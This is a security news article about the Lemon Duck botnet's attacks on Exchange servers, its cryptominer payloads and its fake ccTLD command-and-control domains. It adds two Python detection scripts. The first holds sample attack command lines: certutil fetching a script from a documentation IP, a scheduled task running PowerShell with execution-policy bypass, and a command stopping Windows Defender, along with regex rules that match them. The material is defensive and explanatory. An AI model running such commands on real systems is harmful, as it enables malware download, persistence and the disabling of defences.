Researchers have analyzed the latest activities of the Lemon Duck cybercriminal group, including their exploitation of Microsoft Exchange Server vulnerabilities and their use of fake top-level domains.
The exploitation of Microsoft Exchange Server vulnerabilities by cybercriminals has been a disaster for the security of thousands of organizations.
Four critical vulnerabilities, dubbed ProxyLogon, affected Microsoft Exchange 2013, 2016, and 2010 on-premises servers. Patches, vulnerability detection tools and mitigation guidelines were made available in March, but it is estimated that up to 60,000 organizations could have been compromised. Exploit code is now publicly available, and at least 10 sophisticated cybercriminal groups have used the flaws in their attacks this year.
The Lemon Duck botnet under the microscope
At the end of March, Microsoft warned that the Lemon Duck botnet was attempting to exploit vulnerable servers and use compromised systems to mine cryptocurrency. Today, researchers at Cisco Talos released an in-depth analysis of the tactics of this group.
Lemon Duck operators are integrating new tools to “maximize the effectiveness of their campaigns” by targeting vulnerabilities in Microsoft Exchange Server. Telemetry data from DNS queries to Lemon Duck’s domains indicates that campaign activity peaked in April. The majority of requests came from the United States, followed by Europe and Southeast Asia. There was also a significant spike in requests to a Lemon Duck domain in India.
Lemon Duck operators use automated tools to scan for, detect and exploit servers before installing payloads, such as Cobalt Strike DNS beacons and web shells, which allow them to run additional cryptocurrency mining software and malware.
The malware and associated PowerShell scripts will also attempt to remove antivirus products offered by vendors such as ESET and Kaspersky and shut down any services – including Windows Update and Windows Defender – that could hinder an infection attempt.
Scheduled tasks are created to maintain persistence, and in recent campaigns the CertUtil command line program is used to download two new PowerShell scripts responsible for removing anti-virus products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner.
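The behaviours described above (a web server worker spawning a shell, CertUtil used as a downloader, scheduled tasks created for persistence, and Defender or Windows Update services being stopped) are all visible in process-creation telemetry. The following is an added detection example written for this page; it is not code from Cisco Talos or from the article. The events, hostnames and the 203.0.113.10 address are constructed samples, and the log layout (timestamp, host, parent image, command line) is an assumption about how a SIEM would export such events.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (timestamp, host, parent image, command line).
# None of these come from real telemetry; 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    ("2021-05-07T10:01:02Z", "EXCH01", "w3wp.exe",
     "cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.10/a.ps1 C:\\Windows\\Temp\\a.ps1"),
    ("2021-05-07T10:01:09Z", "EXCH01", "cmd.exe",
     "schtasks.exe /create /sc minute /mo 30 /tn \"Update\" /tr \"powershell -ep bypass -f C:\\Windows\\Temp\\a.ps1\""),
    ("2021-05-07T10:01:15Z", "EXCH01", "powershell.exe", "net stop WinDefend"),
    # Benign look-alikes: certutil computing a hash, and an unrelated service being stopped.
    ("2021-05-07T10:02:00Z", "WS22", "explorer.exe",
     "certutil.exe -hashfile C:\\Users\\alice\\setup.msi SHA256"),
    ("2021-05-07T10:03:00Z", "WS22", "svchost.exe", "net stop Spooler"),
]


@dataclass
class Finding:
    timestamp: str
    host: str
    rule: str
    command: str


# Command-line rules for the tactics the article describes.
RULES = [
    # certutil fetching a remote URL (the -urlcache download trick), not its hashing/certificate uses.
    ("certutil-download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache.*https?://", re.I)),
    # Scheduled task creation used for persistence.
    ("schtasks-persistence",
     re.compile(r"schtasks(\.exe)?\s.*/create", re.I)),
    # Stopping Windows Defender (WinDefend) or Windows Update (wuauserv).
    ("defender-or-update-service-stop",
     re.compile(r"(?:\b(?:sc|net)(?:\.exe)?\s+stop|Stop-Service)\s+.*\b(?:WinDefend|wuauserv)\b", re.I)),
]

# A shell spawned by the IIS worker process is the classic sign of a web shell on an Exchange host.
WEB_WORKER_PARENTS = {"w3wp.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe"}


def image_name(command_line: str) -> str:
    """Return the bare executable name from a command line (first token, path stripped)."""
    first = command_line.split()[0] if command_line.split() else ""
    return first.rsplit("\\", 1)[-1].lower()


def scan_events(events):
    """Run every rule over each event and return the findings in event order."""
    findings = []
    for ts, host, parent, cmd in events:
        if parent.lower() in WEB_WORKER_PARENTS and image_name(cmd) in SHELL_CHILDREN:
            findings.append(Finding(ts, host, "web-worker-spawned-shell", cmd))
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(ts, host, name, cmd))
    return findings


def hosts_by_finding_count(findings):
    """Aggregate findings per host so the noisiest machine surfaces first."""
    counts = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.host:7} {f.rule:32} {f.command}")
    print(hosts_by_finding_count(scan_events(SAMPLE_EVENTS)))
```

Each rule is deliberately narrow: the certutil rule only fires on the `-urlcache` download form, so routine hash or certificate operations do not alert, and the service-stop rule only matches the two services the article names. In practice the first event alone (IIS worker process launching `cmd.exe`) deserves an alert on an Exchange server regardless of what the command line contains.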
The signatures of competing cryptocurrency miners are also listed in a “killer” module aimed at removing them.
SMBGhost and EternalBlue have been used in previous campaigns, but as the exploitation of the Microsoft Exchange Server flaws shows, the group’s tactics are constantly changing to stay ahead of the game.
Lemon Duck also registered fictitious country-code Top Level Domains (ccTLDs) for China, Japan, and South Korea, in an attempt to disguise its command-and-control (C2) infrastructure.
“Considering that these ccTLDs are most often used for websites in their respective countries and languages, it is also interesting that they were used in connection with this attack, rather than more generic and globally used TLDs such as ‘.com’ or ‘.net’,” notes Cisco Talos. “This can allow the malicious actor to more effectively conceal the communications to the control server among other web traffic present in the environments of the victims.”
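Because the concealment relies on C2 lookups blending into ordinary web traffic, a DNS query log is the natural place to look for it: a host that normally never resolves names under a given ccTLD, and then starts querying one such name at a fixed interval, stands out. The following is an added example written for this page, not code from Cisco Talos or the article. The log lines, client addresses, domain names and the allowlist are constructed, and the log format (timestamp, client IP, query name, query type) is an assumption about how a resolver might export queries.

```python
import re
from collections import defaultdict
from datetime import datetime

# ccTLDs the article says were abused; extend to whatever is unusual for your environment.
WATCHED_CCTLDS = {"cn", "jp", "kr"}
# Constructed allowlist: names the organisation legitimately talks to under those ccTLDs.
ALLOWLIST = {"example.co.jp"}

# Constructed resolver log: "<timestamp> <client> <qname> <qtype>". None of these names are real indicators.
SAMPLE_DNS_LOG = [
    "2021-04-12T08:00:00Z 10.0.0.5 mail.example.com A",
    "2021-04-12T08:00:05Z 10.0.0.5 t.constructed-c2.cn A",
    "2021-04-12T08:05:05Z 10.0.0.5 t.constructed-c2.cn A",
    "2021-04-12T08:10:05Z 10.0.0.5 t.constructed-c2.cn A",
    "2021-04-12T08:15:06Z 10.0.0.5 t.constructed-c2.cn A",
    "2021-04-12T08:11:00Z 10.0.0.7 www.example.co.jp A",
    "2021-04-12T08:12:00Z 10.0.0.7 news.constructed-site.kr A",
    "this line is malformed and must be skipped",
]

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["qname"] = rec["qname"].rstrip(".").lower()
    return rec


def tld_of(qname: str) -> str:
    """Last DNS label, lower-cased, with any trailing root dot removed."""
    return qname.rstrip(".").rsplit(".", 1)[-1].lower()


def is_allowlisted(qname: str) -> bool:
    """True if the name equals, or is a subdomain of, an allowlisted name."""
    return any(qname == a or qname.endswith("." + a) for a in ALLOWLIST)


def periodicity(timestamps, min_queries=3, tolerance=0.2):
    """Return (periodic, mean_gap_seconds). Periodic means every gap is within tolerance of the mean."""
    if len(timestamps) < min_queries:
        return False, None
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = sum(gaps) / len(gaps)
    if mean <= 0:
        return False, mean
    return all(abs(g - mean) <= tolerance * mean for g in gaps), mean


def find_suspect_cctld_queries(lines):
    """Group watched-ccTLD lookups per (client, qname) and flag those that recur at a regular interval."""
    seen = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or tld_of(rec["qname"]) not in WATCHED_CCTLDS or is_allowlisted(rec["qname"]):
            continue
        seen[(rec["client"], rec["qname"])].append(rec["ts"])

    results = []
    for (client, qname), stamps in sorted(seen.items()):
        periodic, mean_gap = periodicity(stamps)
        results.append({"client": client, "qname": qname, "count": len(stamps),
                        "periodic": periodic, "mean_interval_s": mean_gap})
    return results


if __name__ == "__main__":
    for r in find_suspect_cctld_queries(SAMPLE_DNS_LOG):
        print(r)
```

The allowlist check is suffix-based so that `www.example.co.jp` is ignored along with the bare `example.co.jp`; without it, every legitimate supplier under a watched ccTLD would generate noise. The periodicity test is a crude beaconing heuristic (gaps within 20% of their mean over at least three queries); it catches a fixed check-in timer but not a jittered one, which is why the single-query `.kr` hit is still reported, just without the periodic flag.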
Links between the Lemon Duck botnet and the Beapy / Pcastle cryptocurrency malware have also been observed.
“The use of new tools, like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, can allow them to operate more effectively for longer periods of time within the environments of the victims,” say the researchers. “New tactics and additional host-based evidence suggest that this player is also now showing a specific interest in Exchange servers, as he attempts to compromise additional systems and maintain and/or increase the number of systems within the Lemon Duck botnet.”